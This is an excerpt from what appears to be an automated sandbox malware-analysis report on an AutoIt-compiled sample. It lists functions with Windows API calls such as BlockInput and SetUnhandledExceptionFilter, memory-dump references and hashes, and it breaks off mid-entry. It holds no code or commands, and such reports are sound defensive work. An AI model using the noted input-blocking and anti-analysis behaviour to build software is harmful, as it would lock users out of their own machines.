                                                      Download Yara Rule
                                                      APIs
                                                      • BlockInput.USER32(00000001), ref: 00EAEABD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: BlockInput
                                                      • String ID:
                                                      • API String ID: 3456056419-0
                                                      • Opcode ID: 16725cf9014a9d0d8866b705607b3000758233e8a02823dc160ba0425827c5e3
                                                      • Instruction ID: 0d247b0a0b30e313c26f18b92e4e6d24d154cc08b757b2c065bcb815619f4bfd
                                                      • Opcode Fuzzy Hash: 16725cf9014a9d0d8866b705607b3000758233e8a02823dc160ba0425827c5e3
                                                      • Instruction Fuzzy Hash: 01E012352002049FC710DF59D404E9ABBD9AF59760F109416FD49EB351D670EC418B90
                                                      Function 00E509D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00E503EE), ref: 00E509DA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 86fe1c3e0f0b7bf790350a715f195a6702a3642eae9ebee422842275214cda0c
                                                      • Instruction ID: b4ec4ff6f28eddde3e3e909f139636d113dd4bfa62f7250af2c33b634aec37d9
                                                      • Opcode Fuzzy Hash: 86fe1c3e0f0b7bf790350a715f195a6702a3642eae9ebee422842275214cda0c
                                                      • Instruction Fuzzy Hash:
                                                      Function 00E5781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0
                                                      • API String ID: 0-4108050209
                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction ID: e3d5b76fa2b3bd5e2eff3a4d4e1166a5bc26dc9b78f066f624302f0638a85bdf
                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                      • Instruction Fuzzy Hash: EC51776160C7155ADB3C8528B95E7FE63C99B9230AF183D09DCC2F7282C611DE6DC362
                                                      Function 00E66DD9 Relevance: .6, Instructions: 637COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d648cfac7ebd6f8c8843a297d3f387a799a2ed1160a6833a27097169fc7078ce
                                                      • Instruction ID: 6353dd8109ceec1b2748214cb22d32ed64515624eee867d6073ac26ee1807efd
                                                      • Opcode Fuzzy Hash: d648cfac7ebd6f8c8843a297d3f387a799a2ed1160a6833a27097169fc7078ce
                                                      • Instruction Fuzzy Hash: 8E324622D6AF414DD7239635EC22335A349EFB73C9F14E737E86AB59A5EB29C4834100
                                                      Function 00E4CC39 Relevance: .6, Instructions: 635COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0c5dbb41147dfb86377ab2dc1cdfb1ed121d2e1c2302af5888c96d1c860fd91
                                                      • Instruction ID: 4c17e8e880066095e10e7fd4443e15fd5be25f33613dc757921c402de1099c75
                                                      • Opcode Fuzzy Hash: e0c5dbb41147dfb86377ab2dc1cdfb1ed121d2e1c2302af5888c96d1c860fd91
                                                      • Instruction Fuzzy Hash: DD322632A001058FCF28EF29D4D46BDB7A1EB46308F38A56AD55EFB291D230DD81DB61
                                                      Function 00E37920 Relevance: .6, Instructions: 563COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d89aca13fdc004d4b541745da6fdd538aba2adb398fd583bdee586b16ceb0875
                                                      • Instruction ID: fe16a021edad24a27d6972b579c70d6dafa0f1452ed24fb044ec3b1da98b4b11
                                                      • Opcode Fuzzy Hash: d89aca13fdc004d4b541745da6fdd538aba2adb398fd583bdee586b16ceb0875
                                                      • Instruction Fuzzy Hash: ED22CFB1A00609DFDF14CF64D885AEEB7F2FF44304F20A629E856B7291EB75A914CB50
                                                      Function 00E391C0 Relevance: .5, Instructions: 475COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 308d9a5289786f9ab583eeb7bf038f80338737c393305e5916e1d95d3d7d7d52
                                                      • Instruction ID: bd88bd1fdfaf7da6f63810f43d4087bb5437e2ffb856c852a543b853cd3bb109
                                                      • Opcode Fuzzy Hash: 308d9a5289786f9ab583eeb7bf038f80338737c393305e5916e1d95d3d7d7d52
                                                      • Instruction Fuzzy Hash: F802B6B0A00105EFDB05DF64D845AAEBBF5FF48304F109169E81ABB391EB71AA14CB91
                                                      Function 00E69EEE Relevance: .3, Instructions: 294COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f13fb03b3fc77799c19151dfcc9f3aa669dc2ae1ef346f1b5cc58ccee892ecbd
                                                      • Instruction ID: 86866973ca769650a6c319974b648eb764fd247f5266560ff15a00d6a32215a1
                                                      • Opcode Fuzzy Hash: f13fb03b3fc77799c19151dfcc9f3aa669dc2ae1ef346f1b5cc58ccee892ecbd
                                                      • Instruction Fuzzy Hash: BAB11320D2AF414DC323963A9931336B75CAFBB6D5F91E31BFC2674D22EB2286874141
                                                      Function 00E57A4A Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f1c18080636a68af2db7780b48e7c5124031e0e8c371cbb3df6318a64d0d4067
                                                      • Instruction ID: 42e1342be64425ee072a1ddb320ab718ce44535be0965b7fb4e69591f0ed6511
                                                      • Opcode Fuzzy Hash: f1c18080636a68af2db7780b48e7c5124031e0e8c371cbb3df6318a64d0d4067
                                                      • Instruction Fuzzy Hash: 0161663060830957EA749A28B995BFE63D6DF4130BF143D19ECC2FB282DA119E6EC315
                                                      Function 00E57CA7 Relevance: .2, Instructions: 237COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c346bf402b29cbc82e47e8ed4f69c7b470be5cee6f2db77197435aaec857c14
                                                      • Instruction ID: e32cd272879c5ec6a08e843e15b75a87411b2b8f930b2fc30230c211fb2981df
                                                      • Opcode Fuzzy Hash: 3c346bf402b29cbc82e47e8ed4f69c7b470be5cee6f2db77197435aaec857c14
                                                      • Instruction Fuzzy Hash: 9E615A7120870956DA3849287956BBE23E49F4370BF103D5DEDC3FB281EA129D6EC355
                                                      Function 00E4D063 Relevance: .1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f67cdcaf3a8c69488fc5e2fceb3e6c6ec5ec84cdb2aa70237e87cf7386358c60
                                                      • Instruction ID: 5d7e1b5f7592a173ec85d6af60ab413f82b0beb5c396a591944234990083ff29
                                                      • Opcode Fuzzy Hash: f67cdcaf3a8c69488fc5e2fceb3e6c6ec5ec84cdb2aa70237e87cf7386358c60
                                                      • Instruction Fuzzy Hash: 61513CC285EBC91BCB53A7745C6A08CBF618C570703684BDFC0F1455E7FA89454AC7A6
                                                      Function 0148A310 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction ID: 5263e7e05a79df6829829e0a2784b9cfd861b2f64fe8a0e6ee97d45b9c56b6b0
                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                      • Instruction Fuzzy Hash: AD41D371D1051CEBCF48CFADC991AEEBBF2AF88201F648299D516AB345D730AB41DB40
                                                      Function 00EA2046 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 128f524c6d7dfc226b0c5af6138b7d7ef588f99b528623219d7e2693b26b861f
                                                      • Instruction ID: 72481ab4020c1651d5c320416d5336a3b8461b2c9f233bb8606f4ca34418ae89
                                                      • Opcode Fuzzy Hash: 128f524c6d7dfc226b0c5af6138b7d7ef588f99b528623219d7e2693b26b861f
                                                      • Instruction Fuzzy Hash: 0121D8323205158BD728CE79C86267A73E5B754310F15862EE4A7D73D1DE36A904D750
                                                      Function 0148A200 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction ID: cf55f17d8dc9b1f89f237aae54c6207e0bfa5477e5a54aac1927252b9f36c2fa
                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                      • Instruction Fuzzy Hash: 6E01E478A00109EFCB44EF98C5809AEF7F5FF88310F20869AD819A7701E731AE41DB80
                                                      Function 0148A1A0 Relevance: .0, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction ID: 1fcc870f70532c03c62f12f80fe14dc920c8c07eff303de0018a807d664356d5
                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                      • Instruction Fuzzy Hash: 95019278A00109EFCB45EF98C5909AEF7B5FB48350F20859AD919A7311D730AE41DB80
                                                      Function 01488B90 Relevance: .0, Instructions: 6COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                      Function 00EB2ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00EB2B30
                                                      • DeleteObject.GDI32(00000000), ref: 00EB2B43
                                                      • DestroyWindow.USER32 ref: 00EB2B52
                                                      • GetDesktopWindow.USER32 ref: 00EB2B6D
                                                      • GetWindowRect.USER32(00000000), ref: 00EB2B74
                                                      • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00EB2CA3
                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EB2CB1
                                                      • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2CF8
                                                      • GetClientRect.USER32(00000000,?), ref: 00EB2D04
                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00EB2D40
                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D62
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D75
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D80
                                                      • GlobalLock.KERNEL32(00000000), ref: 00EB2D89
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2D98
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00EB2DA1
                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2DA8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00EB2DB3
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2DC5
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00ECFC38,00000000), ref: 00EB2DDB
                                                      • GlobalFree.KERNEL32(00000000), ref: 00EB2DEB
                                                      • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00EB2E11
                                                      • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EB2E30
                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB2E52
                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EB303F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                      • API String ID: 2211948467-2373415609
                                                      • Opcode ID: a874a78002138684f1229dcc16412cea85bd7ab0a6c6fb9e8e387ae622525ea7
                                                      • Instruction ID: 33e44792a1cf2623a12e70de77feca9749b4919074bba12b8cc6815afe5d613d
                                                      • Opcode Fuzzy Hash: a874a78002138684f1229dcc16412cea85bd7ab0a6c6fb9e8e387ae622525ea7
                                                      • Instruction Fuzzy Hash: D0028D71900208AFDB14DF65CD89EAE7BB9FF48714F149118F919BB2A1CB71AD06CB60
                                                      Function 00EC70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetTextColor.GDI32(?,00000000), ref: 00EC712F
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EC7160
                                                      • GetSysColor.USER32(0000000F), ref: 00EC716C
                                                      • SetBkColor.GDI32(?,000000FF), ref: 00EC7186
                                                      • SelectObject.GDI32(?,?), ref: 00EC7195
                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EC71C0
                                                      • GetSysColor.USER32(00000010), ref: 00EC71C8
                                                      • CreateSolidBrush.GDI32(00000000), ref: 00EC71CF
                                                      • FrameRect.USER32(?,?,00000000), ref: 00EC71DE
                                                      • DeleteObject.GDI32(00000000), ref: 00EC71E5
                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00EC7230
                                                      • FillRect.USER32(?,?,?), ref: 00EC7262
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC7284
                                                        • Part of subcall function 00EC73E8: GetSysColor.USER32(00000012), ref: 00EC7421
                                                        • Part of subcall function 00EC73E8: SetTextColor.GDI32(?,?), ref: 00EC7425
                                                        • Part of subcall function 00EC73E8: GetSysColorBrush.USER32(0000000F), ref: 00EC743B
                                                        • Part of subcall function 00EC73E8: GetSysColor.USER32(0000000F), ref: 00EC7446
                                                        • Part of subcall function 00EC73E8: GetSysColor.USER32(00000011), ref: 00EC7463
                                                        • Part of subcall function 00EC73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EC7471
                                                        • Part of subcall function 00EC73E8: SelectObject.GDI32(?,00000000), ref: 00EC7482
                                                        • Part of subcall function 00EC73E8: SetBkColor.GDI32(?,00000000), ref: 00EC748B
                                                        • Part of subcall function 00EC73E8: SelectObject.GDI32(?,?), ref: 00EC7498
                                                        • Part of subcall function 00EC73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00EC74B7
                                                        • Part of subcall function 00EC73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EC74CE
                                                        • Part of subcall function 00EC73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00EC74DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                      • String ID:
                                                      • API String ID: 4124339563-0
                                                      • Opcode ID: 90cc1a22ffc7c370d6d2f9de8f3ba7f46a878c1580ec9946198dcb9dc1038f05
                                                      • Instruction ID: 38c792fb519c35a041698acbbd3b6e8a61c149f72b6fb01677414a1d3608d261
                                                      • Opcode Fuzzy Hash: 90cc1a22ffc7c370d6d2f9de8f3ba7f46a878c1580ec9946198dcb9dc1038f05
                                                      • Instruction Fuzzy Hash: EEA1A072009301AFD7009F65DD48E5B7BA9FB48320F241A2DF9A6B61E1D732E94ACF51
                                                      Function 00EB2711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
